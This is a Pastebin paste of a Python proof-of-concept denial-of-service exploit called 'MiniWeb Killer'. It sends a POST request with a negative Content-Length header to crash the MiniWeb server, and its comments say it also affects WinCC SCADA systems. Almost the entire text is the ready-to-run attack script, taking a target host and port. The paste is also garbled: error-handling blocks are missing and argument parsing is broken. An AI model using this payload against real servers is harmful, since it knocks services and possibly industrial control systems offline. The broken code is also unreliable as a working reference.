MiniWeb Content-Length DoS PoC Exploit
infodox May 31st, 2012 331 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
- #!/usr/bin/env python
- # miniweb Content-Length DoS PoC
- # Not a 0day, sadly.
- # aluigi found this ages back, I independantly rediscovered it fuzzing
- # and noticed it was still unpatched. Oh well, better disclose so!
- # vuln version at code.google.com/p/miniweb/
- # affects WinCC also :) (Oh, them SCADA...)
- # Massive props to ohdae for helping with this!
- # insecurety.net | bindshell.it.cx
- import sys
- import socket
- def banner():
- print """
- MiniWeb Killer - Kills MiniWeb
- -Insecurety Research
- -Bindshell Labs
- if len(sys.argv) != 3:
- print "Usage: ./MiniDoS.py <host> <port>"
- target = sys.argv
- port = sys.argv
- evil = "POST / HTTP/1.1\r\n"
- evil += "Host: %s\r\n" %(target)
- evil += "User-Agent: MiniWeb Killer ^-^\r\n"
- evil += "Content-Length: -10 \r\n\r\n" # part that kills the box
- expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
- expl.connect((target, int(port)))
- print "[+] Connected, firing das payload!"
- print "[-] Connection Failed... Is there even a target?"
- print "[+] Payload Sent!"
- print "[-] Payload Sending Failure... WTF?"
- print "[*] Should be dead..."
RAW Paste Data